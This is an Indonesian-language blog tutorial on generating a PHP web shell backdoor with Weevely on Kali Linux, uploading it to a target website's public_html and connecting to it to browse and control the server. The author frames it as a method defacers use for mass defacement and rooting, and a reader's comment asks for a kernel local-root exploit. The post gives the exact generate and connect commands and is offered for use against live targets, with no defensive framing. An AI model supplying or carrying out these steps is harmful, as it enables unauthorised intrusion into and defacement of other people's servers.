Backconnect Server dengan Weevely di kali linux

asalamualaikum

pada kesempatan kali ini saya akan share tutorial cara backconnect server dengan weevely

apa itu backconnect
Backconnect biasanya digunakan untuk server yg tertutup proxy atau firewall. sehingga tidak bisa di lakukan remote connect. Jadi salah satu triknya adalah membalik koneksi, yaitu mengkoneksikan dari server ke komputer kita

jadi jika kita sudah koneksi dengan server maka kita bisa melakukan apa saja di server tersebut mengedit mengupload dan lain2
dan biasanya backconnect server digunakan oleh defacer untuk mass deface
dengan cara rooting server

weevely seperti halnya dengan metasploit yang membuat backdoor dan menunggu di eksekusi target dengan reverse tcp oh ya kita juga bisa backconnect dengan metasploit tapi tutorialnya lain kali ya gan

oh ya weevely juga bisa digunakan di windows tapi anda perlu menginstall
python di windows anda
kalau anda belum punya saya sudah sediakan

weevely => Download
python => Download ( download yang versi 2.7 aja )

setelah bahan sudah terdownload silahkan anda install dulu pythonnya
lalu selanjutnya pindahkan folder weevely yang sudah di ekstrack tadi  di folder c:/python27/
jadi file weevely terletak di c:/python/weevely ( jangan lupa copy python.exe di folder c:/python27 tadi ke c:/python27/weevely
setelah itu buka CMD anda lalu ketik

cd c:/python27/weevely

lalu jalanin deh ketik

python weevely.py generate password anda c:/python27/namabackdoor.php

tapi sayangnya tutorial kali ini saya menggunakan kali linux jadi maaf untuk pengguna windows :D
tapi cara2nya sama kok cuman perintahnya aja beda pada python weevely.py gitu aja kalau di linux tinggal ketik di terminal weevely blablabla

ok saya lanjut tutorialnya ya
buka kali linux anda lalu buka terminal anda
dan silahkan buat backdoornya dulu ya
ketik perintah

weevely generate passwordanda /root/Desktop/namabackdooranda.php

jika sudah maka backdoor terletak di Desktop



setelah itu tinggal anda upload backdoor weevely ke website target
upload di public_html


saya upload backdoor weevely tersebut di public_html
jadi backdoor weevely saya ada di http://target.com/backdoor.php

jika sudah terupload saatnya kita eksekusi target
sekarang ketik perintah di google ups di terminal maksudnya wkwkwk

weevely http://target.com/backdooranda.php passwordanda


dan akhirnya kena juga tuh hehehehe
sekarang kita coba buka folder public_html website target dengan perintah ls


tuh keluar isinya hehehehe

oh ya sebelumnya itu saya menggunakan Kali linux 2.0
dan posisi weevely saya sudah saya fix jadi bisa di eksekusi mungkin tempat agan yang menggunakan kali linux 2.0 akan mengalami hal seperti ini
saat mau mengeksekusi backdoornya


tapi tenang mas sudah saya post kok cara fix weevely di kali linux 2.0
silahkan Kesini


ok demikian tutorial kali ini semoga bermamfaat

inget live target backdoor shellnya sudah saya hapus jadi jika anda mau mencoba2 pakek live target tidak akan bisa karna sudah saya hapus :D

terima kasih kunjunganya

Post a Comment

1 Comments

  1. Om punya localroot kernel 2017 gak :"(

    ReplyDelete